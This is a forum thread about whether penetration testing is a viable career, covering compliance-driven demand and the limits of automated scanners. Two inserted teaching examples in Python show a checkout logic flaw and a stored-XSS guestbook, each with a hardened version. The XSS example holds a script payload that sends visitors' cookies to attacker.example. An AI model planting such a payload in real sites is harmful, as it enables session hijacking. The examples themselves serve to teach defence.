Career as a Penetration Tester?
Master Of Puppets
Member Posts: 1,210
Hi guys,
I am at the beginning of my career in security. I was considering the option of becoming a pen tester because it seems really interesting and something I would enjoy. However, in the past two weeks in which I have been researching the matter I came to the conclusion that this may not be a valid path - the people I talked to and all the info on the internet suggested that the role of the pure pen tester is dead. And of course the fact that it is pretty much automated probably matters. From what I understand the security team can carry out the duties of a pen tester without the need for someone to be appointed just for that. Maybe in a bigger company there would be a place for someone testing the network and searching for vulnerabilities in it?
I guess what I am asking is whether pen testing is something worth going for as a career and if you think there is potential in this field?
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
Comments
Nutsy Member Posts: 136
MOP,
Let me say first that my career path is not security focused. However, having worked in the credit card industry, to obtain your PCI-DSS compliance you must hire (at the company's expense) outside audits of network security and controls. There are companies out there who do that. The catch is how many are there? I would suggest searching for PCI-DSS audits on your favorite search engine, then looking at those companies' job postings. I bet what people were saying is that maybe you need a little broader skill set outside of pen testing to work for those types of companies. That should give you a good cross reference from what you are hearing to see what skills are needed, and by how many companies there are.
In addition, when you find said pen testing company, look at the various audit capabilities that they are advertising they can do. Thus, if you find that maybe the financial sector, or casinos, are major companies who utilize pen testing, then you can expand your search for more companies based on the acronyms used for those security audits.
Food for thought.
Everyone Member Posts: 1,661
Healthcare organizations are another one that are required by law in the US to have regular pen/vuln tests done to meet HIPAA requirements. IIRC they are supposed to have it done twice a year, and can't use the same company more than twice.
Some of the big Fortune 500s that are in industries that do not have legal requirements to have this done do still have FTEs whose only job it is to pen test.
Here is a perfect example of such a job listing: https://careers.microsoft.com/jobdetails.aspx?ss=&pg=0&so=&rw=20&jid=105458&jlang=EN&pp=SS
qwertyiop Member Posts: 725 ■■■□□□□□□□
I'd say just keep on learning. A bunch of the companies that offer pen testing/vulnerability assessments look for people with broad IT experience. For example, if you're doing a pen test for a client that would like to know what you could do/have done to them, you won't always know what kind of environment they may have, so the more experience you have with different equipment/OSes the better off you'll be.
An example of a current pen tester position is this one: https://careers-rapid7.icims.com/jobs/1098/penetration-tester-network-security-consultant/job
Master Of Puppets Member Posts: 1,210
Thanks a lot for the replies. They really helped.
J_86 Member Posts: 262 ■■□□□□□□□□
I work for a financial institution and we are required to have an outside audit that includes a pen test every year. We also never have the same auditor twice. There are still many jobs like that around.
darkerz Member Posts: 431 ■■■■□□□□□□
I see a big benefit of this is going to a bar or club and when people ask you, you tell them you are a Certified Penetration Tester.
I had to, come on.
GoodBishop Member Posts: 359 ■■■■□□□□□□
Or you could get the LPT and say that you are a Licensed Penetration Tester, baby.
Master Of Puppets Member Posts: 1,210
Classic.
paul78 Member Posts: 3,016 ■■■■■■■■■■
Master Of Puppets wrote:
"the people I talked to and all the info on the internet suggested that the role of the pure pen tester is dead. And of course the fact that it is pretty much automated probably matters. From what I understand the security team can carry out the duties of a pen tester without the need for someone to be appointed just for that."
The problem with getting "free advice" on the Internet is that you can never really tell if the source is authoritative or just conjecture and opinion.
On that note - I would respectfully but vehemently disagree with your sources.
The notion that penetration testing is dead because of automation shows a clear lack of understanding of the threat vectors that currently exist. There is a tremendous amount of misinformation that penetration testing is entirely network related which can be accomplished with automated network scanners. That's simply untrue as network tools do not focus on applications. And even with the best automated application vulnerability testers available, automated testing cannot account for logic flaws. That requires human intuition and creativity.
Also - penetration testing for physical defences cannot be automated to my knowledge. And neither can social engineering attack testing.
As for the premise that a security team of general analysts can carry out the duties of a pen tester - that's like suggesting that any surgeon (surgery being a medical specialty) can perform brain surgery. Just because it's tangentially related or a subset, it doesn't imply that there don't need to be specialized skills and/or talents involved. Even within penetration testing, you can focus on different types of penetration testing such as network, application, social, physical.
In the world generally called security - incident management, forensics, pentesting, governance, regulatory and privacy compliance, risk management, IT controls auditing, etc. etc. are very different roles with specific skills.
Don't mean to sound preachy, but since this is free and anonymous advice - well, you get the point.
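As an added illustration of paul78's point about logic flaws (this is example code written for this page, not something posted in the thread or taken from any scanner vendor): a checkout routine whose every input is syntactically valid, so injection and fuzzing payloads bounce off the type checks and an automated scanner has nothing to report, yet a human who asks "what if the quantity is negative, or the coupon is sent twice?" gets the shop to pay the customer. The catalogue, coupon table and Order class are constructed fixtures, not a real application.

```python
# Added illustration (not code from the thread): a pricing flaw that a
# scanner misses because every request is well-formed.  The catalogue,
# coupon table and Order class are constructed for this example.
from dataclasses import dataclass, field

CATALOG = {"sku-100": 40.00, "sku-200": 15.00}   # constructed prices
COUPONS = {"WELCOME10": 10.00}                    # flat discount, meant for one use per order


@dataclass
class Order:
    items: dict                                   # sku -> quantity, as sent by the client
    coupons: list = field(default_factory=list)   # coupon codes, as sent by the client


def checkout_vulnerable(order: Order) -> float:
    """Naive total.  Inputs are known SKUs, integer quantities and valid
    coupon codes, so injection or fuzzing payloads are rejected upstream and
    a scanner reports nothing.  The flaw is semantic: a negative quantity or
    a repeated coupon drives the total below zero, i.e. the shop pays you."""
    total = 0.0
    for sku, qty in order.items.items():
        total += CATALOG[sku] * qty
    for code in order.coupons:
        total -= COUPONS[code]
    return round(total, 2)


def checkout_hardened(order: Order) -> float:
    """Same arithmetic with the business-rule checks a human tester probes for."""
    total = 0.0
    for sku, qty in order.items.items():
        if sku not in CATALOG:
            raise ValueError(f"unknown sku {sku}")
        # bool is a subclass of int, so exclude it explicitly
        if isinstance(qty, bool) or not isinstance(qty, int) or qty <= 0:
            raise ValueError(f"invalid quantity for {sku}: {qty!r}")
        total += CATALOG[sku] * qty
    if len(set(order.coupons)) != len(order.coupons):
        raise ValueError("coupon code repeated")
    for code in order.coupons:
        if code not in COUPONS:
            raise ValueError(f"unknown coupon {code}")
        total -= COUPONS[code]
    # A discount must never become a credit back to the buyer.
    return round(max(total, 0.0), 2)


def is_rejected(order: Order) -> bool:
    """True when the hardened checkout refuses the order."""
    try:
        checkout_hardened(order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    refund = Order({"sku-100": 1, "sku-200": -3})                 # 40 - 45
    double = Order({"sku-200": 1}, ["WELCOME10", "WELCOME10"])    # 15 - 20
    print(checkout_vulnerable(refund), checkout_vulnerable(double))  # -5.0 -5.0
    print(is_rejected(refund), is_rejected(double))                  # True True
    print(checkout_hardened(Order({"sku-100": 1}, ["WELCOME10"])))   # 30.0
```

The point is that neither request contains a single byte a signature-based tool would flag; the bug lives in the relationship between fields, which is exactly what a tester has to reason about by hand.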
lsud00d Member Posts: 1,571
Great points paul... you can't automate the human element in penetration testing.
Humans make mistakes in network, web application, control, and security designs that automated tools might scratch the surface of, but these tools can't combine exploits & payloads, elevate privileges, pivot, or the myriad other combinations that a trained pen tester could possibly do.
Automated tools mainly look for non-SSL connections, signature-based code exploits, directory traversals, SQL/XML/LDAP injections, fuzzing/input validation exploits... basically plug and chug, set it and forget it, review the audits and step into compliance, but that doesn't mean you're out of harm's way.
Master Of Puppets Member Posts: 1,210
Thanks for the advice. Yeah, I had a feeling I need to change my sources.
scaredoftests Mod Posts: 2,780
darkerz wrote:
"I see a big benefit of this is going to a bar or club and when people ask you, you tell them you are a Certified Penetration Tester.
I had to, come on."
Never let your fear decide your fate....
LionelTeo Member Posts: 526 ■■■■■■■□□□
Penetration tester is still a viable route; however, you have to be careful to learn about the inside workings of the organization before you join. And this heavily depends on your location and how mature the penetration testing field is in your area. In my country, from word of mouth, I have friends, or have heard of friends' friends, who work in the penetration testing field but ended up limited to only performing vulnerability scans and writing reports. To make it worse, all the projects come in at the same time after the financial year, which usually means that during a peak period you have to expect to burn your hours not on penetration testing but on reports obtained from automated scanning tools. If that still isn't bad enough, clients may propose performing the penetration test after office hours, because they would like to minimize the risk of anything going wrong during office hours. Things can get even worse if you are required to be on site to scan their internal network, and this could be the case for multiple projects you maintain, forcing you to travel to multiple sites to set up scanning and spend your office time and weekends doing report after report.
This kind of 'penetration testing' is meaningless, as you do not get to employ your skills doing what you are really good at. But this is the general case (in my country) from what I have heard; and logically this is usually the case because in a tight political environment nobody in management wants to be responsible for a server being down, as this could mean the end of their job; and not everyone's interest in penetration testing is to find vulnerabilities: some do it just to comply with an audit or management, some want to show as few findings as possible so they can prove they have done a good job, or to sell their business to their client better and give them a false sense that their organization is safe; and many more freak out at the thought of letting someone obtain root shells and pivot. Lack of client understanding eventually limits the project scope to the safest scope ever, simple vulnerability scanning. Although reporting is important, ideally you would want penetration testing that is 50% skill and 50% report, not 5% skill and 95% report.
If you are truly still interested in the penetration testing field, I would encourage you to focus more on web penetration testing but still have a good grasp of system penetration testing. Although there are still vulnerability scanners for web applications, a web application is quite a dynamic environment that a single scanner cannot cover; for example, stored XSS and session/cookie hijacking are some of the things that a web scanner cannot cover well. Also, if a company is looking for a web penetration tester and not a generic penetration tester, it usually means that the company understands and requires a person to manually verify the vulnerabilities reported. The chances of you landing in a scanning + reporting wasted job would be much slimmer; and if that company covers web penetration testing, usually they would also cover good, solid standard penetration testing and not something like a VA assessment being misunderstood as penetration testing.
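To make concrete why LionelTeo singles out stored XSS as something a scanner covers poorly, here is an added example written for this page (not code from the thread or from any real product): a two-endpoint guestbook where the write endpoint stores the input and redirects, so a scanner that checks each response for its own payload sees nothing, and the script only fires when a different page renders the stored entry. The Guestbook class, the payload and the attacker.example host are all constructed for the illustration.

```python
# Added illustration (not from the thread): why stored XSS is hard for a
# request-by-request scanner.  The Guestbook and the payload are constructed
# for this example; attacker.example is a reserved documentation domain.
import html

# Constructed attacker input: exfiltrates the visitor's cookie when rendered.
XSS_PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
               '+document.cookie</script>')


class Guestbook:
    """Two endpoints: /post writes an entry, /view renders all of them."""

    def __init__(self):
        self._entries = []

    def post(self, author: str, message: str) -> str:
        """The write endpoint.  It stores the input and redirects; nothing is
        reflected, so a scanner checking this response for its payload finds
        no XSS here.  The payload fires later, for every visitor of /view."""
        self._entries.append((author, message))
        return "HTTP/1.1 303 See Other\r\nLocation: /view\r\n\r\n"

    def view_vulnerable(self) -> str:
        """Renders entries as raw HTML: the stored script executes."""
        rows = "".join(f"<li><b>{a}</b>: {m}</li>" for a, m in self._entries)
        return f"<ul>{rows}</ul>"

    def view_hardened(self) -> str:
        """Renders entries with output encoding for the HTML text context."""
        rows = "".join(
            f"<li><b>{html.escape(a)}</b>: {html.escape(m)}</li>"
            for a, m in self._entries
        )
        return f"<ul>{rows}</ul>"


def reflects(response: str, payload: str) -> bool:
    """The single-request check a scanner makes: is the payload echoed back?"""
    return payload in response


def stored_script_present(page: str) -> bool:
    """Crude second-page check: a live <script> tag rather than escaped text."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    gb = Guestbook()
    write_resp = gb.post("mallory", XSS_PAYLOAD)
    print(reflects(write_resp, XSS_PAYLOAD))            # False: /post looks clean
    print(stored_script_present(gb.view_vulnerable()))  # True: fires on /view
    print(stored_script_present(gb.view_hardened()))    # False: shown as text
```

Correlating the injection point with a rendering point elsewhere in the application (and knowing which encoding the rendering context needs) is the manual verification step the post says a company is paying for when it asks for a web penetration tester rather than a scan report.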
Master Of Puppets Member Posts: 1,210
^ That's an excellent post!
I was searching the forum for something and I found this thread. This was at a time when I was making a final decision about the area I would specialize in. I turned to people with more experience who managed to get me a little confused. I am happy to say that I have learned a lot of things since then.
Currently, I am in network security which I absolutely love. Web app pen testing has always been interesting to me but I haven't given it much thought as far as having a career in it is concerned so I will make sure to dig into it.
Also, you could not be more right about the maturity of the field in a given area. I wish someone had told me that a few years ago. In my country, the security scene, as a whole, is far from developed. This is one of the reasons I am going to move in a few years.